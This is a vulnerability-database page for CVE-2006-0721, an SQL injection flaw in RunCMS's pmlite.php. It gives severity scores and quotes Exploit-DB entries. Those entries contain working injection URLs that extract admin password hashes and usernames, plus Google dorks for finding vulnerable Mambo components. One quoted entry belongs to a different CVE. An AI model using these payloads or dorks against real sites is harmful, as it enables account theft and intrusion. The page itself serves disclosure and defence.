CVE-2006-0721
published 2006-02-16CVE-2006-0721: SQL injection vulnerability in pmlite.php in RunCMS 1.2 and 1.3a allows remote attackers to execute arbitrary SQL commands via the to_userid parameter.
PriorityP338high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.71%
74.4th percentile
SQL injection vulnerability in pmlite.php in RunCMS 1.2 and 1.3a allows remote attackers to execute arbitrary SQL commands via the to_userid parameter.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| runcms | runcms | — | — |
| runcms | runcms | — | — |
| runcms | runcms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Mambo Component Sermon 0.2 - 'gid' SQL Injection
exploitdb·2008-02-07
CVE-2008-0721 Mambo Component Sermon 0.2 - 'gid' SQL Injection
Mambo Component Sermon 0.2 - 'gid' SQL Injection
---
#########################################################################
#
# netadvantist@copyright 2006 SQL Injection(com_na_xxx)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com
#
#########################################################################
#
# DORKS 1 : allinurl:"com_na_content"
#
# DORK 2 : allinurl:"com_na_bible"
#
# DORKS 3 : allinurl:"com_na_events"
#
# DORKS 4 : allinurl:"com_na_content"
#
# DORKS 5 : allinurl:"com_na_feedback"
#
# DORKS 6 : allinurl:"com_na_mydocs"
#
# DORKS 7 : allinurl:"com_na_churchmap"
#
# DORKS 8 : allinurl:"com_na_bibleinfo"
#
# DORKS 9 : allinurl:"com_na_dbs"
#
# DORKS 10 : allinurl:"com_na_udm"
#
# DORKS 1
Exploit-DB
RunCMS 1.2/1.3 - 'PMLite.php' SQL Injection
exploitdb·2006-02-14
CVE-2006-0721 RunCMS 1.2/1.3 - 'PMLite.php' SQL Injection
RunCMS 1.2/1.3 - 'PMLite.php' SQL Injection
---
source: https://www.securityfocus.com/bid/16652/info
RunCMS is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
http://www.example.com/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5
http://www.example.com/modules/messages/pmlite.php?send=2&to_userid=-1/**/union/**/select/**/uname/**/from/**/runcms_users%20where%20level=5/*hamid-network-security-team-http://hamid.ir
No writeups or analysis indexed.
http://hamid.ir/security/runcms.txthttp://secunia.com/advisories/18831http://securitytracker.com/id?1015626http://www.runcms.org/public/modules/forum/viewtopic.php?topic_id=4003&forum=18http://www.securityfocus.com/archive/1/425293/100/0/threadedhttp://www.securityfocus.com/bid/16652http://www.vupen.com/english/advisories/2006/0572https://exchange.xforce.ibmcloud.com/vulnerabilities/24676http://hamid.ir/security/runcms.txthttp://secunia.com/advisories/18831http://securitytracker.com/id?1015626http://www.runcms.org/public/modules/forum/viewtopic.php?topic_id=4003&forum=18http://www.securityfocus.com/archive/1/425293/100/0/threadedhttp://www.securityfocus.com/bid/16652http://www.vupen.com/english/advisories/2006/0572https://exchange.xforce.ibmcloud.com/vulnerabilities/24676
2006-02-16
Published